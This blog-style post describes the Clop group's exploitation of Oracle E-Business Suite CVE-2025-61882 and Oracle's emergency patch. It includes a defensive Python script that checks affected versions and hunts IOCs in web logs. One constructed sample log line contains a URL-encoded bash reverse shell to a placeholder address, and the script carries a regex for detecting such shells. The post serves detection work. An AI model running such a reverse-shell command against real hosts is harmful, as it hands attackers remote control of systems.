I would like to share some knowledge that is pretty serious. Clop, a ransomware group, is reported to have gained access to Oracle E-Business Suite (EBS) installations via a new zero-day vulnerability (a 0-day). My immediate thought was, “How did they even do that?”
What We Know
Security researchers who analysed the incident report that the vulnerability, tracked as CVE-2025-61882 and located in the Oracle Concurrent Processing component (BI Publisher Integration) of EBS, is extremely dangerous because it can be exploited over the network without any credentials: an attacker who can reach the EBS web tier over HTTP gets in without logging in at all. Oracle rates it CVSS 9.8. Essentially an attacker can walk in like they live there.
Clop has been exploiting this vulnerability since at least August 2025, stealing large volumes of company data and demanding payment. Google's Threat Intelligence Group also reported that, starting in late September 2025, Clop emailed executives at affected companies claiming to have stolen their files and demanding a ransom.
How the Hack Works
The attack, as described by the researchers, was a chain rather than a single step. Clop combined this 0-day with additional techniques to move from the initial unauthenticated foothold to full control of the EBS host.
The payloads are also fileless: rather than dropping traditional executables on disk, the attackers load small Java programs directly into the memory of the running EBS Java processes. Researchers have named several of these components, including:
- GOLDVEIN.JAVA
- SAGEWAVE
- SKYLANE
Because nothing lands on disk, a file-based antivirus scan will not find them; defenders have to look at process behaviour, outbound connections from the Java processes, and the application and web-server logs. After gaining entry, Clop exfiltrates data and threatens to publish it unless the company pays a ransom.
Oracle’s Response
Oracle did not remain silent. It issued an emergency patch for the vulnerability on 4 October 2025, outside its normal quarterly Critical Patch Update cycle. The patch applies to Oracle E-Business Suite versions 12.2.3 through 12.2.14, and Oracle notes that the October 2023 Critical Patch Update must already be installed before it can be applied.
Oracle called for customers to:
- Install the prerequisite security updates (the October 2023 Critical Patch Update)
- Install the new emergency patch on top of it
- Investigate their systems using the published indicators of compromise (IOCs), since exploitation predates the patch by weeks and patching does not evict an attacker who is already inside
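To make the last two points concrete, here is a small triage helper added for this post. It is not Oracle's tooling and not code from the original article. It checks whether an EBS release string falls inside the affected range Oracle published (12.2.3 through 12.2.14), and it runs a simple IOC hunt over web-server access logs in combined format, URL-decoding each request before matching. The IOC addresses (TEST-NET ranges), the request paths and the log lines are constructed for illustration; the reverse-shell regex is my own pattern, not one of Oracle's published indicators. Swap in the real IOC list from the advisory before using it.

```python
"""Triage helpers for the Oracle E-Business Suite CVE-2025-61882 advisory.

Added example for this post; not Oracle's tooling and not code from the
original article. The affected-version bounds come from Oracle's advisory
(12.2.3 through 12.2.14). The IOC values, request paths and log lines below
are CONSTRUCTED for illustration (TEST-NET addresses); replace them with the
indicators Oracle actually published.
"""
import re
from urllib.parse import unquote

# Affected range from Oracle's advisory, compared as (major, minor, patch) tuples.
AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 14)


def parse_version(version: str) -> tuple:
    """Turn '12.2.10' into (12, 2, 10); reject anything without three numeric parts."""
    parts = version.strip().split(".")
    if len(parts) < 3 or not all(p.isdigit() for p in parts[:3]):
        raise ValueError(f"unrecognised EBS version string: {version!r}")
    return tuple(int(p) for p in parts[:3])


def is_affected(version: str) -> bool:
    """True when the EBS release falls inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


# --- Constructed IOCs (assumption: illustrative values, not Oracle's list) ---
IOC_SOURCE_IPS = {"203.0.113.10", "198.51.100.7"}
# A bash reverse shell inside a request is the kind of command indicator worth
# matching after URL-decoding. The pattern itself is our own, not Oracle's.
IOC_REQUEST_PATTERNS = {
    "reverse shell via /dev/tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
}

# Apache/OHS combined log format: ip ident user [time] "request" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)


def hunt(log_lines):
    """Return one dict per log line that matches an IOC, with the reasons it matched."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = unquote(m.group("request"))  # match on the decoded request
        reasons = []
        if m.group("ip") in IOC_SOURCE_IPS:
            reasons.append("source IP in IOC list")
        for name, pattern in IOC_REQUEST_PATTERNS.items():
            if pattern.search(decoded):
                reasons.append(name)
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("time"),
                         "request": decoded, "status": m.group("status"),
                         "reasons": reasons})
    return hits


# Constructed sample lines (assumption: the /example/ paths are placeholders,
# not real EBS endpoints; /OA_HTML/AppsLogin is the normal EBS login page).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2025:09:12:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [06/Oct/2025:09:13:44 +0000] "POST /OA_HTML/example/servlet HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '10.0.0.8 - - [06/Oct/2025:09:14:02 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Oct/2025:09:15:30 +0000] "GET /OA_HTML/example/cmd?c=bash%20-i%20%3E%26%20/dev/tcp/198.51.100.7/443%200%3E%261 HTTP/1.1" 500 0 "-" "curl/8.4"',
    'garbage line that is not a log entry',
]


if __name__ == "__main__":
    for v in ("12.2.3", "12.2.10", "12.2.14", "12.1.3"):
        print(f"EBS {v}: {'AFFECTED' if is_affected(v) else 'outside affected range'}")
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['status']} {hit['request']} <- {', '.join(hit['reasons'])}")
```

Two design points worth keeping when you adapt this: match on the URL-decoded request, because a shell command in a query string arrives percent-encoded and a raw substring match would miss it; and treat a hit from an IOC source IP as worth investigating even when the request looks harmless, since the same actor will have made many unremarkable requests around the malicious one.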
Why This Is a Big Deal
This is not a small story. It is a zero-day attack: nobody outside the attackers knew about this bug until they started using it, so there was no patch to apply. Companies run Oracle E-Business Suite for core business functions such as finance, HR, supply chain, and customer management, so an attacker inside it has access to a great deal of sensitive data and can do a lot of damage.
What makes this scarier is that exploit code is now in the wild, so the chances of other attackers trying the same attack are much higher. Any EBS instance reachable from the internet that is not yet patched should be treated as a priority, and as potentially already compromised.